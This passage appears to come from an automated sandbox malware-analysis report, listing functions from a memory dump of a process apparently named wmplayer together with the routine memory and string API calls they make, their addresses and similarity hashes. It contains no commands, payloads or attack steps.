                                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 231171946-0
                                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3669619086-0
                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                            • free.MSVCRT ref: 00417425
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5